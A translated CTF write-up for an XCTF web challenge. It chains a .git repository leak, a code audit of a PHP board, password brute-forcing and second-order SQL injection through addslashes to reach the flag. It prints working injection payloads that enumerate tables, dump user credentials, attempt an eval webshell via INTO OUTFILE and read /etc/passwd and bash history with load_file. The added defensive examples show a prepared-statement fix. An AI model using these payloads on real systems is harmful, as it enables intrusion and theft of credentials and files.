CTF_comment_git library leak && secondary injection _wp

Keyword
git library leak code audit addslashes secondary injection sql injection mysql hex query 

Table of contents

foreword

original address

Git repository leak

1.git library discovery

2.git library download

3. Analysis of git library code version information

sql secondary injection

Brute-force user password

Secondary Injection Exploitation

mysql hex query

Refer to web resources


foreword

Git is an open source distributed version control system for agile and efficient handling of any project, small or large. At present, a large number of developers use git for version control and automatic deployment of sites. If the deployment is not configured properly, the .git folder may be published directly to the live environment, which causes the git leak vulnerability. An attacker can use this vulnerability to download the whole contents of the .git folder. If the repository contains sensitive information, such as site source code or database account passwords, the attacker can use that information for further attacks on the server.
 

original address

Offense and Defense World (xctf.org.cn) https://adworld.xctf.org.cn/challenges/list

After opening the challenge, we log in and see a message board.

Trying to post redirects us to a login page.

The placeholder attribute in the form suggests that the username is zhangwei and the password starts with zhangwei (shown as zhangwei***). First we test the form for SQL injection with the usual universal passwords (' or '1, zhangwei'#), but they all fail; when that does not work, the fallback is to run a dictionary against it...

Looking at the traffic from just now: when we click the submit button, the form posts to write_do.php?do=write, but without a login session the request is redirected to login.php, which asks us to log in.

These are all preliminaries. The git repository is the focus of this CTF challenge.

Git repository leak

1.git library discovery

Scanning the site with dirsearch shows that a git repository directory exists:

dirsearch -u http://61.147.171.105:56303/

Trying to download the .git directory directly fails because access to it is forbidden (403). A dedicated tool is needed at this point.

┌──(kali㉿kali)-[~]
└─$ wget -r http://61.147.171.105:56303/.git
--2023-0x-xx 08:31:09-- http://61.147.171.105:56303/.git
Connecting to 61.147.171.105:56303... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://61.147.171.105:56303/.git/ [following]
--2023-0x-xx 08:31:09-- http://61.147.171.105:56303/.git/
Reusing existing connection to 61.147.171.105:56303.
HTTP request sent, awaiting response... 403 Forbidden
2023-0x-xx 08:31:09 ERROR 403: Forbidden.

2.git library download

Download GitHack:
git clone https://github.com/BugScanTeam/GitHack

GitHack (BugScanTeam/GitHack on GitHub) is a .git leak exploitation tool that restores historical versions: https://github.com/BugScanTeam/GitHack. Use it to download the git repository:
python2 GitHack.py http://61.147.171.105:56303/.git/

3. Analysis of git library code version information

Go into the folder created by GitHack and prepare to use the git command:

cd 61.147.171.105_56303 ; ls

The code in this checkout does not seem to be finished yet:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

Files in a Git working directory can be in several modification states (added, deleted, updated), and these states change as Git commands are executed.

Our main focus is the commit log:

git log --reflog

The history contains three versions, and the comment-related code sits at the first entry in the list.
git reflog

Querying with the git command also confirms that the author deliberately rolled the repository back to version bfbd21. In fact we can still reach the e5b2 version, which shows that rolling back a version does not delete the earlier commits.

Here I use the diff command to see what was added and changed between each version, which makes the code audit easier.

There is no difference between the first version and the second version.

Compare the first version with the third version:

└─$ git diff bfbdf218902476c5c6164beedd8d2fcf593ea23b e5b2a2443c2b6d395d06960123142bc91123148c

Roll back to the e5b2 version to view the code:

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
cat write_do.php

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

sql secondary injection

Code audit (the analysis is in the comments):

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");// no session info: redirect to login.php, so we must log in first
    die();
}
if(isset($_GET['do'])){// the do parameter is passed via GET
switch ($_GET['do'])
{
case 'write'://?do=write
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);// special characters in the category, title and content parameters are escaped by addslashes
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);// execute the insert statement
    header("Location: ./index.php");
    break;
    // searching the web for "addslashes sql injection" gives an important lead: addslashes leaves room for secondary (second-order) injection
    // reference: https://blog.csdn.net/weixin_52501704/article/details/126863948
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);// as expected, a second query is made here
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];// category is user-controlled and is concatenated straight into the SQL, so injection is possible
    $content = addslashes($_POST['content']);// take content; copy the category from the board table into the comment table
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    // suppose the input was the following (/**/ is a multi-line comment, # a single-line comment):
    //$category = 1',content=database(),/*
    //content = */#
    // the statement would then read (illustration only, not part of the real code):
    //$sql = "insert into comment
    //        set category = '1',content=database(),/*',
    //            content = '*/#',
    //            bo_id = '$bo_id'";

    $result = mysql_query($sql);// execute the statement that carries the secondary injection risk
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

The figure below shows that addslashes does not add any backslash to */#.

Although addslashes turns ' into \', the backslash is gone once the value has been inserted into the database.

So addslashes leaves a possibility of secondary injection. Reference: Study Notes - SQL Injection 2: addslashes SQL injection (H1111B's blog on CSDN), SQL Injection - Secondary Injection (Principle): https://blog.csdn.net/weixin_52501704/article/details/126863948

The principle of secondary injection: when the data is first inserted into the database, only addslashes (or get_magic_quotes_gpc) is used to escape the special characters in it. addslashes has the property that, although a ' in the parameter becomes \' after filtering, the backslash itself is not stored: MySQL consumes it when it parses the string literal, so the original, unescaped data is what gets written to the database. When that stored value is later read back and concatenated into another query without escaping, the injection fires.
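The flow described above, as an added example that is not code from the original write-up: sqlite3 stands in for MySQL, and the step where MySQL strips the backslashes while parsing a '...' literal is emulated by a small helper, so the value stored in board.category is the raw input. The vulnerable comment path builds the second query by concatenation exactly as write_do.php does (the text is returned, not executed), and the hardened variant shows the fix: bind every value, including the one read back from the database, as a parameter.

```python
"""Second-order SQL injection via addslashes(), and the prepared-statement fix.

Added example, not code from the original write-up. sqlite3 stands in for
MySQL; MySQL's own step of decoding backslash escapes while parsing a '...'
literal is emulated by mysql_literal_decode(), so board.category holds the raw
input exactly as the write-up describes.
"""
import sqlite3


def addslashes(s: str) -> str:
    """Port of PHP addslashes(): backslash before ' " \\ and NUL."""
    out = []
    for ch in s:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def mysql_literal_decode(escaped: str) -> str:
    """Value MySQL stores after parsing a '...' literal built with addslashes()."""
    out, i = [], 0
    while i < len(escaped):
        if escaped[i] == "\\" and i + 1 < len(escaped):
            nxt = escaped[i + 1]
            out.append("\x00" if nxt == "0" else nxt)
            i += 2
        else:
            out.append(escaped[i])
            i += 1
    return "".join(out)


def setup_db() -> sqlite3.Connection:
    """Constructed schema matching the two tables used by write_do.php."""
    db = sqlite3.connect(":memory:")
    db.execute("create table board (id integer primary key, category text, title text, content text)")
    db.execute("create table comment (id integer primary key, category text, content text, bo_id text)")
    return db


def write_post(db, category: str, title: str, content: str) -> int:
    """do=write: addslashes() on the way in, but the stored value is the decoded literal."""
    stored = tuple(mysql_literal_decode(addslashes(v)) for v in (category, title, content))
    cur = db.execute("insert into board (category, title, content) values (?, ?, ?)", stored)
    return cur.lastrowid


def vulnerable_comment_sql(db, bo_id: int, content: str) -> str:
    """do=comment as on the page: category is read back and concatenated unescaped.
    Returns the SQL text that would be sent to MySQL (it is not executed here)."""
    (category,) = db.execute("select category from board where id = ?", (bo_id,)).fetchone()
    return ("insert into comment set category = '" + category + "', "
            "content = '" + addslashes(content) + "', bo_id = '" + str(bo_id) + "'")


def safe_comment(db, bo_id: int, content: str):
    """Hardened do=comment: every value, including the one read back, is a bound parameter."""
    row = db.execute("select category from board where id = ?", (bo_id,)).fetchone()
    if row is None:
        return None
    db.execute("insert into comment (category, content, bo_id) values (?, ?, ?)",
               (row[0], content, str(bo_id)))
    return db.execute("select category from comment where bo_id = ?", (str(bo_id),)).fetchone()[0]


# Constructed input modelled on the payload shown in the write-up.
PAYLOAD_CATEGORY = "1',content=database(),/*"


def demo():
    """Run both paths on the same post; returns (stored value, vulnerable SQL, safe result)."""
    db = setup_db()
    bo_id = write_post(db, PAYLOAD_CATEGORY, "title", "*/#")
    stored = db.execute("select category from board where id = ?", (bo_id,)).fetchone()[0]
    return stored, vulnerable_comment_sql(db, bo_id, "*/#"), safe_comment(db, bo_id, "*/#")


if __name__ == "__main__":
    stored, sql, safe = demo()
    print("stored category :", stored)   # backslash gone, quote intact
    print("vulnerable query:", sql)      # the quote closes the literal, the rest is SQL
    print("safe comment row:", safe)     # payload stored as inert text
```

On the PHP side the equivalent fix is a mysqli or PDO prepared statement for the insert into comment with $category bound as a parameter; escaping at write time is no substitute, because the escaping is consumed by the first query and never reaches the second.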

We need to obtain a login session before exploiting the vulnerability.

Brute-force user password

Brute-force the password of user zhangwei:

1. Mark the password parameter as the attack position under Intruder

2. Set the payload

3. Analyse the result: the password is zhangwei666

Secondary Injection Exploitation

Logged in, ready to post; the form submits to write_do.php?do=write

From the analysis we also know that the message submission is where the content for the secondary injection we are looking for ends up.

Input content = */#

As expected, the response here is different: there is indeed a second-order SQL injection, and it also reveals that the current database is ctf.

Construct the SQL injection point:
1', content=(select 123), /*

Query the tables under the database ctf:
1', content=(select group_concat(table_name) from information_schema.tables where table_schema='ctf'), /*

(content = */# )

Query the columns of the user table:
1',content=(Select group_concat(column_name) from information_schema.columns where table_name='user'),/*

Returned columns:

id,username,password,Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string

Query the data in those columns:
1', content=(select concat_ws(':', id, username, password) from user), /*

After a long time spent looking for a clue to the flag in the SQL database, nothing turned up.

Check whether there is file export/import permission. This is really hard to verify under the current conditions, so we directly try to write a webshell, guessing that the web root is under /var/www:

select '<?php @eval($_get["cmd"])?>' into outfile "/var/www/shell.php"
1',content=(select '<?php @eval($_get["cmd"])?>' into outfile "/var/www/shell.php" ),/*
1',content=(select 123 into outfile "/var/www/shell.txt" ),/*

I tried a lot here; it seems that the one-line webshell is filtered, and even 123 was not written successfully.

Then use load_file to read other important files, using a specialised dictionary so as to collect as much information as possible.

Reference dictionary:

Auto_Wordlists/wordlists (carlospolop/Auto_Wordlists on GitHub): https://github.com/carlospolop/Auto_Wordlists/tree/main/wordlists

Collect users:

1',content=(select load_file('/etc/passwd')),/*

We find the www user; next, try to read that user's command history:

1',content=(select load_file('/home/www/.bash_history')),/*

The history shows: cd /tmp, unzip the package html.zip and copy it to /var/www/, enter /var/www and delete the file .DS_Store.

We can look in /tmp to see what hidden things the deleted .DS_Store records:

1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

Is this a normal string? Copy it.

mysql hex query

There are signs that this file is not plain text, so, since mysql provides the hex function, we extract the binary data of the file instead:

1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

This gives a large block of binary data.

For binary data, I show two ways of decoding it here.

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000200000000100000040000000010000008000000001000001000000000100000200000000010000040000000000000000010000100000000001000020000000000100004000000000010000800000000001000100000000000100020000000000010004000000000001000800000000000100100000000000010020000000000001004000000000000100800000000000010100000000000001020000000000000104000000000000010800000000000001100000000000000120000000000000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001044453444200000001000000000000000000000000000000000000000000000002000000200000006000000000000000010000008000000001000001000000000100000200000000000000000200000800000018000000000000000001000020000000000100004000000000010000800000000001000100000000000100020000000000010004000000000001000800000000000100100000000000010020000000000001004000000000000100800000000000010100000000000001020000000000000104000000000000010800000000000001100000000000000120000000000000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

The first: an online HEX-to-character decoder (converts a hexadecimal byte stream into a string; supports gb2312/gbk/utf8 and unicode) at The X Online Tools: https://the-x.cn/encodings/Hex.aspx

CyberChef (gchq.github.io): https://gchq.github.io/CyberChef/

Paste the hex into it.

The second uses a hex editor.

Create a new txt file, open it in the hex editor, paste in the binary data, and the decoded characters appear on the right.
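Both decodings above only turn the hex back into bytes and leave it to the eye to pick the file names out of the UTF-16 text. As an added example (not from the original write-up), the scanner below does that step properly for the dump produced by hex(load_file(...)): a .DS_Store record is a 4-byte name length, the name in UTF-16BE, a 4-byte structure id (Iloc here), a 4-byte data type (blob here) and the payload, and the scanner looks for that shape at every offset. It does not walk the file's B-tree, which is enough to list what names a leaked .DS_Store exposes. The sample is an excerpt of the dump shown above (the block holding the eleven directory entries), split across lines for readability.

```python
"""List the directory entries recorded in a .DS_Store file given as a hex dump.

Added example, not from the original write-up. A .DS_Store record is:
  uint32 name length (in UTF-16 code units), name in UTF-16BE,
  4-byte structure id (e.g. Iloc), 4-byte data type (e.g. blob), payload.
The scanner looks for that shape at every offset instead of walking the
file's B-tree; that is enough to see which names a leaked .DS_Store exposes.
"""
import string

_NAME_CHARS = set(string.ascii_letters + string.digits + string.punctuation + " ")
_DATA_TYPES = {b"long", b"shor", b"type", b"bool", b"comp", b"dutc", b"blob", b"ustr"}

# Excerpt of the dump shown above: the block holding the eleven directory entries.
SAMPLE_HEX = """
0000000B
000000090062006F006F007400730074007200610070 496C6F63 626C6F62 00000010 0000004600000028FFFFFFFFFFFF0000
0000000B0063006F006D006D0065006E0074002E007000680070 496C6F63 626C6F62 00000010 000000CC0000002800000001FFFF0000
00000003006300730073 496C6F63 626C6F62 00000010 0000015200000028FFFFFFFFFFFF0000
000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070 496C6F63 626C6F62 00000010 000001D800000028FFFFFFFFFFFF0000
000000050066006F006E00740073 496C6F63 626C6F62 00000010 0000004600000098FFFFFFFFFFFF0000
000000090069006E006400650078002E007000680070 496C6F63 626C6F62 00000010 000000CC0000009800000002FFFF0000
00000002006A0073 496C6F63 626C6F62 00000010 0000015200000098FFFFFFFFFFFF0000
00000009006C006F00670069006E002E007000680070 496C6F63 626C6F62 00000010 000001D800000098FFFFFFFFFFFF0000
00000009006D007900730071006C002E007000680070 496C6F63 626C6F62 00000010 0000004600000108FFFFFFFFFFFF0000
0000000600760065006E0064006F0072 496C6F63 626C6F62 00000010 000000CC00000108FFFFFFFFFFFF0000
0000000C00770072006900740065005F0064006F002E007000680070 496C6F63 626C6F62 00000010 0000015200000108FFFFFFFFFFFF0000
"""


def _payload_size(dtype: bytes, buf: bytes, pos: int):
    """Size of the payload that follows the data type, or None if it cannot fit."""
    if dtype in (b"long", b"shor", b"type"):
        return 4
    if dtype == b"bool":
        return 1
    if dtype in (b"comp", b"dutc"):
        return 8
    if dtype in (b"blob", b"ustr"):          # length-prefixed: bytes, or UTF-16 units
        if pos + 4 > len(buf):
            return None
        n = int.from_bytes(buf[pos:pos + 4], "big")
        return 4 + (2 * n if dtype == b"ustr" else n)
    return None


def _try_record(buf: bytes, pos: int):
    """Parse one record at pos; returns (name, struct_id, dtype, end) or None."""
    if pos + 4 > len(buf):
        return None
    n = int.from_bytes(buf[pos:pos + 4], "big")
    if not 1 <= n <= 255:
        return None
    name_end = pos + 4 + 2 * n
    if name_end + 8 > len(buf):
        return None
    raw = buf[pos + 4:name_end]
    # UTF-16BE of an ASCII file name: every high byte is 0, every low byte printable
    if any(raw[i] for i in range(0, len(raw), 2)):
        return None
    name = raw.decode("utf-16-be")
    if any(c not in _NAME_CHARS for c in name):
        return None
    struct_id = buf[name_end:name_end + 4]
    dtype = buf[name_end + 4:name_end + 8]
    if not struct_id.isalpha() or dtype not in _DATA_TYPES:
        return None
    size = _payload_size(dtype, buf, name_end + 8)
    if size is None or name_end + 8 + size > len(buf):
        return None
    return name, struct_id.decode("ascii"), dtype.decode("ascii"), name_end + 8 + size


def extract_ds_store_entries(hex_dump: str):
    """Scan a hex dump (as returned by MySQL hex()) for records; whitespace is ignored."""
    buf = bytes.fromhex("".join(hex_dump.split()))
    entries, pos = [], 0
    while pos < len(buf):
        rec = _try_record(buf, pos)
        if rec is None:
            pos += 1                         # not a record here, slide one byte
            continue
        name, struct_id, dtype, end = rec
        entries.append((name, struct_id, dtype))
        pos = end                            # skip the payload, never rescan it
    return entries


def filenames(hex_dump: str):
    """Distinct file names in the order they appear in the dump."""
    seen = []
    for name, _, _ in extract_ds_store_entries(hex_dump):
        if name not in seen:
            seen.append(name)
    return seen


if __name__ == "__main__":
    for name, struct_id, dtype in extract_ds_store_entries(SAMPLE_HEX):
        print(f"{name:30} {struct_id} {dtype}")
```

Pointed at the full dump rather than the excerpt, the same scanner skips the Bud1 header and allocator tables on its own, since nothing there matches the record shape; the names it recovers are the complete listing of the directory the file came from, which is why a stray .DS_Store in a web root is treated as an information leak in its own right.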

Accessing the page shows that the file does exist but displays no content, so we use the SQL secondary injection once more:

1',content=(select load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*

In the source code we get the flag:

$flag="flag{0dd14aae81d94904b3492117e2a3d4df}";

Refer to web resources

git exploit tool
https://github.com/BugScanTeam/GitHack

sql secondary injection addslashes
Study Notes - SQL Injection 2: addslashes SQL injection (H1111B's Blog, CSDN): https://blog.csdn.net/weixin_52501704/article/details/126863948

Git repository usage tutorial - Dark Horse Programmer
Dark Horse Programmer Git complete tutorial, the complete Git project management tool tutorial (Bilibili)

File inclusion dictionary reference
Auto_Wordlists/wordlists (carlospolop/Auto_Wordlists, GitHub): https://github.com/carlospolop/Auto_Wordlists/tree/main/wordlists

hex decoding
CyberChef: https://gchq.github.io/CyberChef/
HEX to character conversion (gb2312/gbk/utf8 Chinese character internal code conversion) - The X Online Tools: https://the-x.cn/encodings/Hex.aspx


Source: https://blog.csdn.net/shelter1234567/article/details/130710692